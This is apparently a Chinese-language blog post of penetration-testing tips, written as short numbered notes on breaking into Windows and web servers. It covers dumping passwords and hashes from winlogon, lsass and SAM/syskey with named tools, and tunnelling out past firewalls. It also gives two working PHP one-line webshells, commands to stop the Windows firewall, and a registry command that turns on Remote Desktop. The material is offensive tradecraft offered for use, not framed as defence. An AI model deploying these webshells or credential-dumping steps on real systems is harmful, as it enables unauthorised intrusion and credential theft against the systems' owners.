滲透測(cè)試筆記主要為一些短小但又精華的滲透小技巧，旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量，每一篇為20條左右的滲透小記。

[[110986]]

1、在win系統(tǒng)中，控制用戶登陸的系統(tǒng)進(jìn)程是“winlogon.exe”，系統(tǒng)在每一個(gè)用戶登陸時(shí)都會(huì)產(chǎn)生一個(gè)“winlogon.exe”進(jìn)程。通過查找這個(gè)進(jìn)程訪問的內(nèi)存模塊，可以獲得保存在內(nèi)存中的用戶名和密碼。

2、“Lsass.exe”是win下一個(gè)必不可少的進(jìn)程，屬于微軟win系統(tǒng)中安全機(jī)制的相關(guān)進(jìn)程，此進(jìn)程主要用于本地安全和登陸策略，同時(shí)也管理域IP相關(guān)的安全信息?？捎肔SASecretsView這個(gè)軟件破之。

3、上手的時(shí)候，先搜搜有沒有備份好的SAM文件。例如管理員經(jīng)常將重要的文件備份在c:\windows\repair或是c:\windows\backup下，如果找到，將省去大半的功夫。

4、有經(jīng)驗(yàn)的管理員會(huì)使用C:\Windows\System32\syskey.exe這個(gè)小工具來對(duì)系統(tǒng)密碼做雙重加密，像bios密碼一樣加多一次防護(hù)。

5、跟SAM文件的防護(hù)機(jī)制一樣，syskey.exe這個(gè)小工具也會(huì)生成一個(gè)類似的文件叫做system。也在c:\windows\system32\config目錄下?？捎肧AMInside軟件附帶的一個(gè)小工具GetSyskey.exe來抓取syskey。

6、對(duì)方開放42端口要特別留意，可能啟用了WINS服務(wù)，進(jìn)一步說明背后可能有著復(fù)雜的內(nèi)網(wǎng)拓?fù)浣Y(jié)構(gòu)。

7、進(jìn)行嗅探時(shí)，對(duì)網(wǎng)絡(luò)結(jié)構(gòu)布局的了解是必須的，否則嗅探很可能會(huì)失敗。常見的VLAN類型有以下幾種：(1)基于端口的VLAN.(2)基于MAC地址的VLAN.(3)基于路由的VLAN.(4)基于策略的VLAN.

8、HTRAN、LCX等端口轉(zhuǎn)發(fā)出不來被墻的一個(gè)解決辦法猜想，可以看看對(duì)方的防火墻是什么牌子滴，下一個(gè)回來本地看看它升級(jí)的時(shí)候流量是從哪個(gè)端口出去的。(不過大型企業(yè)的防火墻都是在內(nèi)網(wǎng)的，服務(wù)器省級(jí)的….)

9、HTRAN、LCX轉(zhuǎn)發(fā)失敗，還可以嘗試的辦法是80端口復(fù)用，也就是HTTP隧道，這方面的工具有reDuh和tunnal(使用說明請(qǐng)戳這里)

10、使用wce_1.4.exe可以非常有效地抓取windows的哈希，如果不成功，可以嘗試以下兩點(diǎn)：(1)提升到system再次嘗試;(2)在非系統(tǒng)終端嘗試一下(webshell)

11、如果再不出來，在嘗試下PingTunnel(Ptunnel)和DnsTunnel(DNS2tcp)，如果不行，那就只好360你好，360再見了…….<(￣)￣)>

12、linux主機(jī)傳二進(jìn)制文件的幾個(gè)方法:scp/sftp/ftp/tftp/wget

13、簡(jiǎn)便執(zhí)行命令的PHP一句話(當(dāng)然，很多網(wǎng)站都會(huì)把system函數(shù)給禁了)：

<?php echo '<pre>';system($_GET['cmd']); echo '</pre>'; ?>    #用法xxx.php?cmd=whoami 

14、一句話上傳不上去?不妨試試這個(gè)：

<?php $_GET[a]($_GET[b]);?>          #利用方法：xxx.php?a=assert&b=${phpinfo()}; 

15、在windows執(zhí)行命令時(shí)，遇到空格用“”括起來就可以執(zhí)行，例子如下：

net stop windows" "firewall  
net stop Windows" "Firewall/Internet" "Connection" "Sharing" "(ICS) 

16、干掉IPSEC后仍然無法連接3389，就可以用到antifw工具，自動(dòng)停止IIS將3389轉(zhuǎn)到80上，本工具介紹請(qǐng)參見本站文章

17、命令行下查看3389遠(yuǎn)程桌面信息：

(1)查看遠(yuǎn)程桌面有沒有開啟：

net start | find "Remote Desktop Services"         #win7、win2008  
net start | find "Terminal Services "                     #win xp、win2003 

或是

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections 

如是0×0，則可以連接，考慮是否有tcp過濾或者防火墻了;如果沒有打開為0×1。

(2)查看遠(yuǎn)程桌面連接所開的端口是多少：

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "ServerWinStationsRDP-Tcp /v PortNumber 

一般默認(rèn)顯示是0xd3d ， 也就是3389。

18、命令行下開啟3389：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 

win7親測(cè)可用。

19、一些網(wǎng)站的網(wǎng)頁(yè)沒有擴(kuò)展名，或者只出現(xiàn).html的靜態(tài)網(wǎng)頁(yè)的拓展名。判斷此類網(wǎng)站用的什么技術(shù)，需要從幾方面分析：

方法(1)：

查看該網(wǎng)站的開發(fā)開放平臺(tái)。

a.比如：GOOGLE有個(gè)GoogleCode，里面提供GOOGLE各種Search Engine API，還有GoogleAJAX。那么GOOGLE提供的API全是JAVA的(全無PHP，ASP等)，由此可以判斷GOOGLE必定就是JSP。

c.再比如：去維基百科，當(dāng)你點(diǎn)到某些提交信息的按鈕時(shí)候，IE的狀態(tài)欄(下方)會(huì)馬上呈現(xiàn)…php的拓展名。正常在地址欄上看不到.php的原因是，Wikipedia會(huì)把你提交信息后，轉(zhuǎn)到另一個(gè).html頁(yè)面，而不會(huì)直接顯示那個(gè).php頁(yè)面。

方法(2)：

學(xué)習(xí)JSP，PHP等相關(guān)技術(shù)，就能了解用這些技術(shù)開發(fā)的網(wǎng)站的特點(diǎn)，根據(jù)結(jié)構(gòu)就可以判斷。

a.比如：校內(nèi)網(wǎng)，他們?cè)谡衅搁_發(fā)者只要求會(huì)JSP，Struts(JSPMVC的結(jié)構(gòu)之一)。而且校內(nèi)大部分開放平臺(tái)開發(fā)的游戲都是JSP寫的，由此斷定，校內(nèi)就是用JSP的(其實(shí)校內(nèi)拓展名.do是典型的JSPStruts)。

b.比如：百度，從它貼吧，知道上提交模式，以及百度大部分拓展名都被隱藏(PHP網(wǎng)站經(jīng)常用apache里的功能來隱藏拓展名)來看，百度就是用PHP的。

方法(3)：

在該網(wǎng)站的招聘要求中，看看應(yīng)聘網(wǎng)站后臺(tái)程序員，需要會(huì)什么語(yǔ)言。校內(nèi)網(wǎng)的招聘網(wǎng)頁(yè)，就是個(gè)好例(yin)子(dang)。